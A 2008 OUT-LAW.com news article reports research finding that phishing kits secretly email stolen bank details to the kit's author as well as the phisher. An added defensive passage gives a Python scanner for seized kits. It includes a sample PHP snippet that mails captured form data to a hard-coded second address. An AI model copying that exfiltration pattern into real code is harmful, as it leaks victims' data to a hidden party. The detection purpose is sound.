Bank scammers scammed, says security researcher

Hacking tools nick nicked data

Many of the people behind identity theft scams are themselves having data stolen from them in the process, a security researcher has revealed.

Phishers, who trick online banking users into typing their details into fake sites, rely on tools that carry built-in security holes through which others can reach the stolen data, holes that many phishers lack the technical skill to spot, according to a security researcher.

Nitesh Dhanjani will next week tell the Black Hat security conference in Washington of the results of his and his colleague Billy Rios's immersion in the world of phishers. He told OUT-LAW Radio of his findings this week.

Dhanjani claims that most phishers are far from the technical sophisticates of the popular imagination. Most, he said, use pre-written phishing kits that take little skill to operate.

"What you see in [the kits] is ready-made phishing sites," he said. "All the research we've done is just basically what you can do from a web browser without even crossing the line where it's called hacking."

Dhanjani said it was extremely easy to come across details that had been stolen just hours previously. "Within 15 minutes of starting this research we were staring at people's bank accounts and credit card numbers and ATM PIN numbers posted on international message boards," he said.

But the authors of the phishing kits are using more junior phishers to do the work for them. Dhanjani said that when he and Rios, who both work for unnamed major corporations, looked at the computer code in the kits, they found it contained two different instructions commanding the system to email a victim's details.

"We realised that in the second mail command there was a hard-coded email address that the victim's information was also going to," said Dhanjani. "So unbeknown to the phisher deploying this kit, his information from the victim is going to him in addition to the author who wrote this kit, so there you have a phisher phishing a phisher."
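The double mail command Dhanjani describes is something an incident responder can check for when a kit's server-side handler is recovered from a compromised host. The following is an added example, not code from the article or from the researchers: it scans a PHP source for `mail()` calls, resolves simple string variables, and reports every distinct recipient, so a second hard-coded address stands out. The kit snippet and the addresses in it are constructed placeholders.

```python
import re
from typing import List

# Constructed stand-in for a seized kit's handler: the operator's address
# lives in a variable, while a second mail() call names a hard-coded address.
SAMPLE_KIT_PHP = r'''<?php
$to = "operator@example.com";
$message = "captured form fields go here";
mail($to, "Results", $message);
@mail("kitauthor@example.net", "Results", $message);
?>'''

# First argument of each mail() call, up to the first comma.
MAIL_CALL = re.compile(r'\bmail\s*\(\s*([^,]+),', re.IGNORECASE)
# Simple $name = "literal"; assignments, enough to resolve $to above.
ASSIGN = re.compile(r'\$(\w+)\s*=\s*["\']([^"\']+)["\']')


def find_recipients(php_source: str) -> List[str]:
    """Return the recipient of every mail() call, in source order.

    Variables are resolved against plain string assignments; anything
    more obfuscated (concatenation, base64) is returned as-is so the
    analyst still sees that a call exists.
    """
    assignments = dict(ASSIGN.findall(php_source))
    recipients = []
    for first_arg in MAIL_CALL.findall(php_source):
        arg = first_arg.strip()
        if arg.startswith('$'):
            recipients.append(assignments.get(arg[1:], arg))
        else:
            recipients.append(arg.strip('"\''))
    return recipients


def has_extra_recipient(php_source: str) -> bool:
    """True when captured data is mailed to more than one distinct address."""
    return len(set(find_recipients(php_source))) > 1


if __name__ == "__main__":
    for addr in find_recipients(SAMPLE_KIT_PHP):
        print("mail() recipient:", addr)
    print("extra recipient present:", has_extra_recipient(SAMPLE_KIT_PHP))
```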

Gartner estimated that phishing scams cost $3.2bn in 2007, and there are significant costs over and above the money lost, because it is often very difficult and time-consuming for people to prove that they were not responsible for spending in their name.

Dhanjani said that there is no easy fix to the problem. He said that until banks and governments have more sophisticated systems than just simple credit card or government identity numbers the problem will continue.

He said, though, that the cost of changing those systems was greater than the sums currently being lost, meaning the systems are unlikely to change soon.

Copyright © 2008, OUT-LAW.com

OUT-LAW.COM is part of international law firm Pinsent Masons.
